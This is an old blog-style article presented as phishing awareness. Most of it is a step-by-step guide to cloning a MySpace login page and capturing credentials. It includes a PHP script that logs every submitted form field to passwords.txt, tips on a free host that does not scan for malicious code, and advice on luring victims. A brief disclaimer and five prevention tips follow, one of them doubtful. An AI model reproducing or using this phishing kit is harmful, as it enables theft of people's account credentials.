Webupon

It’s Friday night. After an exhausting week of tedious school work and extra curriculars, you sink into your computer chair. Let’s see what’s happening on myspace, you think. Shortly after signing in you see the all to familiar ‘new friends request’ lit up on the screen. In sheer excitement you begin to click away. “But wait, I don’t even know this girl who is trying to add me. She is kinda cute though. I’ll just check her page out and see what she’s about”. After going to her page there is one thing that seems to echo off the page. It’s the bright link her about me section that reads: ‘Click here to see my Pics’.

Once again the clicking begins. Instead of some hot little numbers ultra revealing photos you get a page saying ‘you must log in to do that’. Without hesitation you hammer in your user name and password with lightning speed, as not to waste any quality time with this hotties half nude pics. You quickly slam on the mouse, thrusting it over the login button, only to be redirected to the myspace.com homepage. “WTF?”, you think, wondering why there’s no photo’s of half naked women on your screen. Well, there’s no photos because you’ve just been fished.

—warning—

Before you read any further please be aware that phishing, whether it’s on ebay or just some harmless myspace page, is highly illegal. This article is meant to teach you the methods so you know how to prevent them from happening to you. Do not use these techniques to phish, it’s bad for your health.

Phishing attacks, like the one described above, are becoming more and more common everyday. Hackers are using these attacks to accumulate sensitive info (like passwords) from their prey. Myspace is the least of the worry on this subject. Sophisticated phishing methods have been developed to steal YOUR paypal, ebay and other financially associated materials. This article will describe, in strict detail, exactly how phishing attacks are performed and a few tips on how to identify and avoid them.

Let’s Go Phishing: How phishing exploits are created and implemented

A phishing attack, if you know what your doing, is rather easy to carry out. The first step is to find the site you want to fish from. In this article I will use myspace as the prime example. Once you’ve found your target site, you have to find a page that says something along the lines of ‘error, you must log in to do that’. This is usually accomplished by trying to preform an action that requires you to login, while you’re not logged in. For example, on myspace click some one’s profile image. Once this page loads click on the message link. This will take you to the exact page we’re talking about (so long as your not logged in. Obviously if you do this while logged in it will just take you to a page to message the person).

Once you’ve found the page all you have to do is right click and go to view source. Now copy and pase the entire source code to notepad. Save this file as index.txt.

Now that you have your index page you must create a php file to carry out the action of capturing the text that’s entered and then write it to a text file. (I’m not going to go into detail about the actual writing of the script, as this is not a tutorial on php. I’ll just post it and hopefully you will get the general idea.) Your php file should look something like this:

header (’Location: http://myspace.com ‘);
$handle = fopen(”passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Now that you have your two essential pages the next step is linking the two to perform the attack when initiated. To do this, first open the php script. Set the (’location:  ‘) string to the homepage of the site you are phishing from. Now open the index.txt file from earlier. Find the login script. Find where it says

, x being whatever you named the php file.

Now you have a working model of a phisher. To put it into use simply find a free web host that supports php, and doesn’t crawl for malicious codes. I have found that one of the only sites that still fit this description is www.t35.com. Once you start an account either upload your files using FTP or copy and paste their sources into the text editor. Now create a blank text file and name it passwords.txt. This is the file that the php script will write the user name and passwords too.

Now all you have to do is attract people to your malicious link, which will be the homepage of the web you started (for instance www.phishphishphish.t35.com). When they click the link they will be directed to your index file. If they are naive they will attempt to re-login initiating the php script, thus writing their user name and password to the passwords.txt file. View the file and you now have their login info.

(P.S. When copying the files or the source code over to the free web server please note that the index page must be saved as .html, not .txt. It is only saved as a txt in notepad for quick reference.)

Preventing Phishing Attacks

Follow these few tips and you will greatly reduce your chances of being phished.

1. Check your Links. If you hover over a link it will usually display the url path in the lower left hand corner of most browsers, just above your computers tool bar (where it says start). If the path doesn’t match what the link is telling you, DON’T FOLLOW IT.

2. Watch for suspicious URL’s. If you are directed, on any site, to a page asking you to re-login then check the url bar. Phishing attacks will usually use a sub-domain to attack from, so it will look something like this:

www.yoursite.t35.com—This is usually a dead give away.

3. If you are using firefox (why wouldn’t you be. It’s the most safe and secure and it’s FREE) you can set the options to warn you when you click a link that leaves the site you are currently on, which is exactly what will happen when you are in the process of being phished. To do this open your firefox browser and click on tools. Go all the way down in the drop box and find the options. Click options and find the advanced settings menu. Now check the box that says ‘warn me when web sites try to redirect or reload the page’

4. If you are redirected to a page that asks you to re-login and you are suspicious of it try logging in with a fake username/password combo. If it takes you to an error page saying that it’s a false user name and password then it’s legit, and it’s safe to return and login with your real info. If it takes you to a web page with no error screen or anything else of this nature then you just threw a wrench in a half bit hackers plans.

5. Watch for suspicious emails. Common phishing techniques include fraudulent emails claiming to be from certain companies such as ebay and paypal. Ignore these emails. When companies like ebay and paypal have issues that need to be noted or taken care of, they will normally send you an alert on their web site, not in an email.